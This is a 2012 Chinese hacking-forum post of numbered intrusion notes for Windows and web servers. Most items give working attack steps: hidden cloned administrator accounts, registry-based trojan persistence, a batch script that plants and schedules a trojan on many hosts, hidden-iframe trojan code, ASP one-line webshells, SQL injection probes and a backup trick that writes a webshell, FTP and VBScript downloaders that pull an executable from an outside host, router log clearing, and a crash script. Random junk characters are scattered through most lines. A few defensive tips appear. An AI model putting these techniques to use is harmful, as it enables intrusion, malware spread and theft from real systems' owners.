找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2163|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
( B8 z% ?( i* @& xcacls C:\windows\system32 /G hqw20:R
2 S+ ~- D7 z+ v+ ~) @1 f  k- n思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入2 q2 {; z  Q* b* t/ z' Q9 j
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F  J" F$ k- k1 x1 I/ E9 W2 [

+ R, r' G. h/ n& O* C5 l) [2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。- Z5 _' ~5 c- K& a8 u, g3 N
6 M! y3 n0 v% k
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
$ s3 C* n& z) {1 s* y# }6 K. T7 a/ N/ i
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号* W7 x  Q0 X7 ]% W" h
6 x. g+ T8 B6 Z+ v  j+ |
5、利用INF文件来修改注册表3 ?* s! h. J- G
[Version]! ?9 }9 g6 D( p2 P% i0 b8 O
Signature="$CHICAGO$"
# m! t% U! T- a3 M1 r[Defaultinstall]
  y  A: e: t, C  PaddREG=Ating
  k! P; a# R! Y" ~. d# H[Ating]
; l  X3 _+ X- B, D1 i, ~6 T/ bHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
" W5 v- l6 e! k4 w( [! p$ F8 h4 A* ^9 K以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
" Z8 W6 u5 m3 e: Arundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
9 O/ d, D1 x( F" p' J其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
# `, ^2 h! ^# m+ ?+ k+ }. R6 fHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU& L& P1 X: y$ J. q
HKEY_CURRENT_CONFIG 简写为 HKCC
) T. J6 z, D" i! p! Q, r, T, Z+ @0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值. n% i9 K8 b$ S- Q+ j
"1"这里代表是写入或删除注册表键值中的具体数据
) S- E" o# }! I( x7 V, [; b) I" Y3 G6 S  z/ w3 ?' T* o; R8 j
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画," q8 R" o# s9 J# D5 W+ {
多了一步就是在防火墙里添加个端口,然后导出其键值
1 N  P/ v# x+ ^# j[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
1 _; D, @# m5 h: Z& P1 o1 ^( }  `: X+ G
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽7 c. q: m  p% D" y9 Z
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
  L! s$ u, z% q+ ^
4 I8 c- U3 G  M/ ?: h8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。! k* u. C1 |; m4 Z. s
8 X' L2 x2 @% n6 e; R, y! r' J& t
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
( L5 U2 S( v1 N* ^( {8 {可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
( h2 B1 x8 T1 d9 ~2 p8 Z6 v) F5 o4 F  Y- ]9 n5 o6 _0 e6 w
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
" ], C4 D% r  l6 U" O, J
$ C0 v5 B8 f% F( `% x1 }7 {11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
" m; r! o" O' ]' \: J用法:xsniff –pass –hide –log pass.txt" L) ]( n! C; R
  H( ^* W7 M4 L2 h( ~
12、google搜索的艺术
) r* i+ ]0 c3 a9 z4 T搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
7 ^" v1 W4 o1 C- Q6 P或“字符串的语法错误”可以找到很多sql注入漏洞。
6 ?) j* {/ n' f& A$ X9 H
) c9 z0 l2 Q3 E. _  h# x" K13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。% I- V2 c4 f% a) }, r, _/ p0 P

, H# r% ?; }/ C& V  \% j14、cmd中输入 nc –vv –l –p 1987% ?+ K7 R  M' N5 h% p* u! E/ }
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
" u; A' ]- g. t; u$ k/ X5 a0 H; [: [6 b
15、制作T++木马,先写个ating.hta文件,内容为
% m2 H( F5 M6 L! m' c& K<script language="VBScript">% c; [9 }" s" D5 X4 P
set wshshell=createobject ("wscript.shell" )
1 W4 M. N+ O6 @% Q8 Q/ @a=wshshell.run("你马的名称",1)0 }5 K5 q  Y1 o6 E  X
window.close
; E  H! i( C8 ~6 }: R7 j; G</script>- j- V1 C% W; C) r/ X! m
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。9 p  Z- m0 a0 q  s
( N  v/ H. a2 W/ I  _3 [. ?$ V8 ~( i
16、搜索栏里输入
8 K+ J) s3 v: k7 I1 Y关键字%'and 1=1 and '%'='
9 r0 Z0 p! p9 H1 ^1 |0 w关键字%'and 1=2 and '%'='2 l: I/ G# F  T; Z
比较不同处 可以作为注入的特征字符
* Q6 m* s9 c- d& q5 R  R2 R8 E9 K+ Z+ x$ d- @5 i
17、挂马代码<html>
8 B" b  o! y3 g& e" c<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>: c  e: m/ K1 M% j* Q4 N
</html>
$ A2 t, Z1 b. A4 t( g. u7 F" F! w  }, f7 _
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,9 d8 j1 r& v" M1 O
net localgroup administrators还是可以看出Guest是管理员来。
' e0 ]& J9 A" @4 J* c% y" ?: G; F4 E$ o* `
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等, W8 I4 e* P" D5 g- P2 y
用法: 安装: instsrv.exe 服务名称 路径6 Z2 E/ F$ c5 U9 V1 {, T6 a
卸载: instsrv.exe 服务名称 REMOVE' ^2 R9 r7 ?) b" x/ M: s0 B* c0 q1 U
- E0 x$ `& ~: s1 G+ L+ P
( c+ E* @7 N  ^- g6 b' r2 w7 N) B+ f
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
( r. D5 B) s% y2 k! I8 c4 T+ L不能注入时要第一时间想到%5c暴库。% ]; `9 {  v4 q3 U( c5 B

8 K9 d- f  `5 V9 z1 P' X22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~. q4 U( M* n. v8 }

* U4 r+ L4 K' Z23、缺少xp_cmdshell时
" @! s. k3 @+ A3 Z& r# P2 r尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
3 }2 x4 C5 ]1 t1 q' S假如恢复不成功,可以尝试直接加用户(针对开3389的)
# Y; x: T$ v! y: `  Bdeclare @o int. Z' _: r, M$ `6 Z
exec sp_oacreate 'wscript.shell',@o out) Q, {( e& z4 Q! m% x
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员! T1 N2 J; W5 o1 j

9 R1 u+ @3 a! w1 s% e$ U24.批量种植木马.bat
+ b' [, E; v$ F6 a. b2 r" j7 cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中. x7 y: t* f. u
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
5 @' ]5 c5 o0 G* U扫描地址.txt里每个主机名一行 用\\开头& S, X/ U6 ]( k  Y+ z( R% f
. P% ]- I: `3 s; H5 ^$ X# ^* S% ?1 Z
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。& @  m3 k/ @7 F, H

1 w3 }, Y& z- c$ Y26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.. E" ?4 d% H. n$ @: V" N; ~$ M
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
% _2 Y! K1 I# N3 t4 O.cer 等后缀的文件夹下都可以运行任何后缀的asp木马) ^; k; _4 Q' P; U6 l! ^

, L- Y* A) ~. u4 W27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP0 ?# [$ A) |  q+ z: ~  A& b1 q
然后用#clear logg和#clear line vty *删除日志  Q' c" V9 l! l
! U* E4 F) N/ m5 K( H! i9 m
28、电脑坏了省去重新安装系统的方法
/ \/ a# Q" I  ^# @  f纯dos下执行,5 Y% P3 R# B1 ]  \7 I# F4 Z5 t, e
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
' X# E1 u  W6 ?8 \8 [+ z2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
  i  S/ v, ~/ _' s" w* `) k! Z) ~
+ M: @$ S% f3 H2 [" W! ~29、解决TCP/IP筛选 在注册表里有三处,分别是:
% X& P, ?+ J, f  eHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip$ R$ O9 q' `9 }9 ]% X4 I" Y7 ?  b
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) u/ Y: U( g+ T6 U' L0 \: d) OHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 {3 b3 ]8 F2 Q) V7 v分别用$ }, r5 K; M4 W% m
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" h6 s$ O0 W8 G4 c/ u& B: h9 I* h
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip  n' U" h: M0 y' o: B0 Y! n$ B
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& z! F$ l( r# L* e/ A+ E. i命令来导出注册表项
7 Q0 v2 E/ u  n5 g* A然后把三个文件里的EnableSecurityFilters"=dword:00000001,& _/ D/ V7 f4 N; f
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用' i% P' H: k( K" Q  b2 U# w
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。# u3 }  I9 h. j5 J% `

0 X+ K5 D: n& N8 `30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
. Q+ [  R% f& \+ n; {+ ]; PSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
  D4 }3 H: h7 x' \- s  J/ U
  f. d6 z6 B* F31、全手工打造开3389工具
% N; p# i: \3 R4 J打开记事本,编辑内容如下:4 O+ K( J' U/ t9 R; G8 @
echo [Components] > c:\sql
& z$ v# g7 a# A" Gecho TSEnable = on >> c:\sql
9 O/ J1 O- Y2 n7 [) M6 ^' y( zsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q* f; ]9 W9 z. B0 C5 g) s" c5 l! G
编辑好后存为BAT文件,上传至肉鸡,执行
6 Z3 r; S: g( g4 i) M; Q
  m* o9 M) T$ z, ~" Z% ~8 k32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马5 D1 r' j, Y! v2 t
* P' y. A$ j: Z2 z, e
33、让服务器重启5 f0 X- C. S; H/ w, Y( t' O- n
写个bat死循环:
1 n5 _1 C% W. `, W. J- M@echo off
( |' \1 }! Z' H5 }# l:loop1
# u4 ]$ J# i6 k: |4 R% wcls
2 m; J! Y+ s2 [. sstart cmd.exe, W# q( C$ T/ r0 J
goto loop1
& |: M( v) Z7 ?' n  _保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
1 w' W9 S: I% J4 C0 |, S+ T; u0 t& m, \0 @8 _
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,7 w9 O, _  `1 q8 j, g1 f
@echo off4 |( ^, v" F* ]2 M: T" o) p% k, r2 q2 P
date /t >c:/3389.txt
% g% b$ p, b: Mtime /t >>c:/3389.txt
0 F' V+ q: Q( W8 d# C' F' |! \/ Fattrib +s +h c:/3389.bat
& P" S: T; g5 h$ o  h6 R8 P" pattrib +s +h c:/3389.txt
3 d8 Y" b: [% M, Q, o: snetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
4 L) J( b( C3 T. U3 N; H6 t. s并保存为3389.bat+ F: ?* S6 Y/ Y% Z# A8 E  ^4 ]' u
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号6 F/ v7 k$ j4 M: ]! ~% q
2 ?: I6 ~, L7 o3 `
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
, F. [) c; I7 }, J* rstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)4 b. J& k; k' M4 h" ]$ f0 }
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。1 _3 k! M5 p8 T' r! }- X
( e/ m1 e; D$ o: `" _4 h: I7 f
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件! j# n0 R! ^) T8 L, k% _
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址# y8 |- C5 F% `; E6 X3 h" o' t4 \
echo 你的FTP账号 >>c:\1.bat //输入账号5 z& ^/ E/ T* s. d! Q- `6 b" U
echo 你的FTP密码 >>c:\1.bat //输入密码1 A7 r3 V8 T3 w2 t, a7 X' A$ t  d0 b
echo bin >>c:\1.bat //登入
: U: o: s- b' \6 o) G1 Yecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 K* S! a% a" M7 O5 u2 ?echo bye >>c:\1.bat //退出1 @/ R+ {/ L$ @' E! ]9 h' b
然后执行ftp -s:c:\1.bat即可) ^# t* ^& u0 g7 @3 P- ^3 |/ W

( O) @" ~: N/ e0 D37、修改注册表开3389两法
* o* n0 ]: N" P, u0 C3 W(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表, {9 d" ^: S8 d/ f# u) i1 P: {
echo Windows Registry Editor Version 5.00 >>3389.reg
+ d' U& j# Y# Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg  o! ]7 c3 V( H  k" q
echo "Enabled"="0" >>3389.reg7 u2 M$ Q$ E; u" I9 x( A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows. t$ ]! A  u, }0 {9 [
NT\CurrentVersion\Winlogon] >>3389.reg0 \8 C$ ?0 }: j- W, \  y$ ?" |( I8 m+ K
echo "ShutdownWithoutLogon"="0" >>3389.reg" e# W& h1 b* ?5 m, ?) q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]8 C4 ]+ k- B0 s) s: b' n9 x
>>3389.reg5 @- x0 T1 x+ M5 q2 ?
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
4 ?# i% ?$ k3 fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
7 o0 r( W* t. F1 R+ b>>3389.reg
1 ]/ p5 G% k  I" y% c2 `- H6 V6 U1 Necho "TSEnabled"=dword:00000001 >>3389.reg& r! P+ @, E5 X4 C+ E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! L2 X0 B, a: L) c
echo "Start"=dword:00000002 >>3389.reg" e6 b! _& E; @/ V) r+ a, M0 Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]. u4 n& B1 _; i4 x% j. a# W! z# x  {" x
>>3389.reg) J2 h& G% A2 }) X
echo "Start"=dword:00000002 >>3389.reg
+ q2 f: D( t2 `0 I. G0 }echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg. ?2 U$ U% e9 B: D" W& r
echo "Hotkey"="1" >>3389.reg4 e& a) R% h6 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ I4 j) K, K/ R! o5 CServer\Wds\rdpwd\Tds\tcp] >>3389.reg
0 O* S/ E4 u! h1 K* u. K$ }9 Pecho "PortNumber"=dword:00000D3D >>3389.reg
4 L2 [9 V5 c+ S1 hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 L- ?: j% G8 `4 ?% Y: f$ }/ e6 n) D
Server\WinStations\RDP-Tcp] >>3389.reg, N$ M( F. U2 \/ x7 Q% B$ ?
echo "PortNumber"=dword:00000D3D >>3389.reg2 [+ t3 I; \9 U1 m+ `
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
, \  a; Z) H* ^. Y2 V8 M. [(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
, \" h& ~( ?  ?/ V$ ^0 C) f' v: k因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效/ x6 V- U3 [0 S/ K; u
(2)winxp和win2003终端开启
" k* w: U  B2 ?1 W0 `用以下ECHO代码写一个REG文件:% k  Z1 w! X- ]
echo Windows Registry Editor Version 5.00>>3389.reg
4 t( d1 p# [. k  j/ N+ o. qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. C1 I( v4 e" H- A# H; J: A+ rServer]>>3389.reg
5 G4 ?9 _9 A9 Z) S- u$ ?3 `; W- [echo "fDenyTSConnections"=dword:00000000>>3389.reg
& w( l) D7 G, V% m! `, `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" B) w& v; M) ^' Y3 C2 a
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
! @  Z# n  L6 W" lecho "PortNumber"=dword:00000d3d>>3389.reg
, i9 ^9 L# H6 p8 M1 Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- R1 h& F3 |; d- a: j& M& v0 ]Server\WinStations\RDP-Tcp]>>3389.reg
( E, Y" R4 O3 |- S7 n  Uecho "PortNumber"=dword:00000d3d>>3389.reg  D. |- a+ k$ @  x
然后regedit /s 3389.reg del 3389.reg
9 u' ?4 @( d! R7 ^XP下不论开终端还是改终端端口都不需重启7 N: f3 ^/ T! D, {: u( H: k

7 Y- V9 h6 W5 y. x, {' H$ y( [" z38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃( X* {/ o' x9 Z$ T- g
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 Q' k/ A) B& R7 u! @
& i5 x: @  Z6 v  r. o39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!, @* X$ S1 b+ @# i# t. C& d
(1)数据库文件名应复杂并要有特殊字符
6 ^+ F' [& t) u, r' s  W(2)不要把数据库名称写在conn.asp里,要用ODBC数据源) S+ N) W! Y3 p$ W+ U! `& n( o
将conn.asp文档中的6 l( \) o- s0 A  y
DBPath = Server.MapPath("数据库.mdb")
0 i) n& J9 Q5 v2 j; {- V) J5 L+ sconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath! j" I. `! v/ p( B9 ~, B7 r

. _$ S% b& K2 e$ z( Z' A; ~修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置% A3 V' t3 _( E: D+ V6 x
(3)不放在WEB目录里4 C# ?  b# \5 x  i+ j& ~- k/ F

# m9 D+ o1 j, [8 [) L9 a6 B40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
4 p: f7 P- ^2 F+ G可以写两个bat文件
! H" N6 F/ b  i0 ~@echo off5 y6 F/ q3 q( [$ C
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe6 U! ~+ ~$ s( |9 ]
@del c:\winnt\system32\query.exe. w$ s8 X6 Q" B3 i. |7 {
@del %SYSTEMROOT%\system32\dllcache\query.exe7 w* d/ _5 G. Y4 B6 u( N
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的9 f! F/ w. }: V% m0 |! I5 X

6 G0 x5 o; X) }  s5 a@echo off
% s1 B7 C3 \4 V0 ?, l# \7 y* T( K! C@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe; t! ?0 k7 H/ @1 p
@del c:\winnt\system32\tsadmin.exe
. z6 W& k7 R- F8 M@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex5 m! D- i: ?0 s5 p% F
) x. v1 {+ |3 J/ _0 \3 [
41、映射对方盘符1 k8 o! O( v3 V5 L( I1 {5 y: {& V
telnet到他的机器上,6 {- n) ^/ j" u  B8 m, a9 A
net share 查看有没有默认共享 如果没有,那么就接着运行7 X* N1 I- n% S: V% F: P2 n
net share c$=c:
$ u% f, S1 s: u4 s# Gnet share现在有c$- x9 L. `+ H+ l
在自己的机器上运行
* |, s' a) t' `" O1 _% e: \net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K- ^1 i5 \/ w& m0 Y; L
+ z0 Y- f, w" f8 C1 @
42、一些很有用的老知识
. H% H% v! F* \  c1 {1 xtype c:\boot.ini ( 查看系统版本 )+ \- Q' L' R$ I
net start (查看已经启动的服务)% d9 W$ s: m7 t& l
query user ( 查看当前终端连接 )
4 P" q6 W4 i# Qnet user ( 查看当前用户 )
* j2 i  z9 ?) o1 _4 _# r6 R5 xnet user 用户 密码/add ( 建立账号 )5 @4 m  m7 Q5 L8 S# J) H% k4 ^6 n
net localgroup administrators 用户 /add (提升某用户为管理员)
* d% u% o7 Y1 `2 i6 K" zipconfig -all ( 查看IP什么的 )
& S2 W( T( p+ v! ~. k4 D) H2 m3 w. ~2 P1 Unetstat -an ( 查看当前网络状态 )" z) H! S0 W6 Q6 L
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)! v7 F' x1 @7 S
克隆时Administrator对应1F4
& V3 o( X' e0 Nguest对应1F5
6 ?) h/ g$ e5 Ftsinternetuser对应3E8! i  r( k: {1 W4 ^! d+ Q
- o, ]1 j3 A! O& \0 N
43、如果对方没开3389,但是装了Remote Administrator Service
( ?5 t5 b: h& Z用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
+ K) s* _) J5 D; G' ]. w) c, @& i解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
. ~" K  b. d9 P" j) N. k6 M先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin", i1 W1 x! N2 q( G4 S# M" |" G
/ l+ c1 j5 s5 d& g
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)" s) J* d' |2 \1 n, `$ K
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口): U* V1 c, }3 s5 C# N* A

+ Y, c5 ]4 i8 ~& u45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
. }3 Z6 B$ K/ {. k5 \8 recho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open$ Q+ f8 \* o! h  f/ n
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
( p9 ?* d  @+ t9 XCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =; V) v+ ?; n4 x9 V" l; t2 {) K
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
# L+ `6 y8 P8 `1 M' Z7 s(这是完整的一句话,其中没有换行符)% y6 H# v: p  I, R) Q
然后下载:
: i6 P  ]/ ]' J( ?2 X; Kcscript down.vbs http://www.hack520.org/hack.exe hack.exe
3 j) i6 J; x. m  H5 [" O
/ v# m% f1 ]' \# a46、一句话木马成功依赖于两个条件:, x! k* ^! L$ {. X1 ?1 g
1、服务端没有禁止adodb.Stream或FSO组件
5 \% x- H2 U8 R* O' L2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
8 H' s/ I9 m/ z7 y
. x/ ?, t/ E: t0 ^" D47、利用DB_OWNER权限进行手工备份一句话木马的代码:6 @( [5 }/ o: \+ K& W5 D
;alter database utsz set RECOVERY FULL--
/ V" Q: w8 S. C* [6 O;create table cmd (a image)--
: v1 R$ g1 _8 m  K;backup log utsz to disk = 'D:\cmd' with init--3 \( U; m; Y- N8 k  @3 N
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
3 O2 J! k# o; A3 V4 \+ Y, v;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--+ u& z5 F) O) r# q! u% I
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
* V, f; ]# T, c1 ^% }
1 a( ]$ v5 \4 {% }48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
& x1 C& ^3 n" f( J9 J
- ^. d: F, m9 a- {1 A6 O用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
+ V% `6 ~% g) f+ t  a所有会话用 'all'。! K; h5 Q8 w7 R0 \
-s sessionid 列出会话的信息。) m' w- Z$ R/ D8 U8 t8 U/ `$ C
-k sessionid 终止会话。
' l: U9 R( p3 l, t6 \5 D-m sessionid 发送消息到会话。
+ `- T/ Y4 o0 z# g+ M7 z9 O; }& W' A2 r
config 配置 telnet 服务器参数。
9 L% X+ k6 ]( o! Y0 W0 _- H5 [
, S2 `3 v; n* D5 Y( icommon_options 为:
/ T; K! T+ L, e-u user 指定要使用其凭据的用户! P: d5 v8 [5 u
-p password 用户密码
3 }+ Y+ z: m% N5 i) H: f
: o9 l5 c! |- G3 P+ Q! Zconfig_options 为:- o$ k$ S, B; i6 f  |
dom = domain 设定用户的默认域/ k; A  R: T* M2 Z5 @
ctrlakeymap = yes|no 设定 ALT 键的映射
% a" V5 y' f4 o) L# ptimeout = hh:mm:ss 设定空闲会话超时值2 ]3 u' x% ^7 p" P8 F
timeoutactive = yes|no 启用空闲会话。
% s5 s4 d( H% ^$ v% Umaxfail = attempts 设定断开前失败的登录企图数。7 ]) U- \/ i8 I# A1 l% c
maxconn = connections 设定最大连接数。
. U/ F" q  v% d, X! W& x& oport = number 设定 telnet 端口。
% I) v, e  N. j' i  ]sec = [+/-]NTLM [+/-]passwd" y* R7 R, _% N" D0 g' d' T
设定身份验证机构, \+ {6 X9 ^8 X, u
fname = file 指定审计文件名。
, M1 u4 j$ q, P( Bfsize = size 指定审计文件的最大尺寸(MB)。
% l% X1 Q; m3 m! }1 Hmode = console|stream 指定操作模式。
. Q) h/ V' v1 Q% v& m' N/ O5 R% @auditlocation = eventlog|file|both; W2 ]8 q0 ]% r3 L/ s
指定记录地点
/ U! V4 ^0 Z+ s1 s! [audit = [+/-]user [+/-]fail [+/-]admin
2 d- {5 M( M2 T2 S3 C' l3 ^" F* M
4 ~! T/ x2 Z  A5 w' ~9 n0 n49、例如:在IE上访问:$ r8 _6 i+ s& J% y
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
1 }3 G- Q2 P3 j0 {* a5 nhack.txt里面的代码是:: l3 m6 B" s6 @- E0 Y6 M
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
/ I" N* T8 \/ ~/ Z, n" P把这个hack.txt发到你空间就可以了!
4 Z, d9 W( I& L0 A2 z1 P这个可以利用来做网马哦!
7 p3 o% T1 G# J
6 W3 _3 f; t9 R50、autorun的病毒可以通过手动限制!" l- s. W% D. t4 U0 r4 k
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!4 q/ e- g5 l" |, O- |# T  S0 `
2,打开盘符用右键打开!切忌双击盘符~
, K+ y3 j1 Z' i2 z! U) e4 }8 q, Z3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!) b1 X( M1 ]) i
! M; o7 Z! S2 w+ h3 i
51、log备份时的一句话木马:6 ^% C0 @$ D# N, u! ^5 o
a).<%%25Execute(request("go"))%%25>
$ a8 i" t) L+ O. |$ t6 ?  `b).<%Execute(request("go"))%>
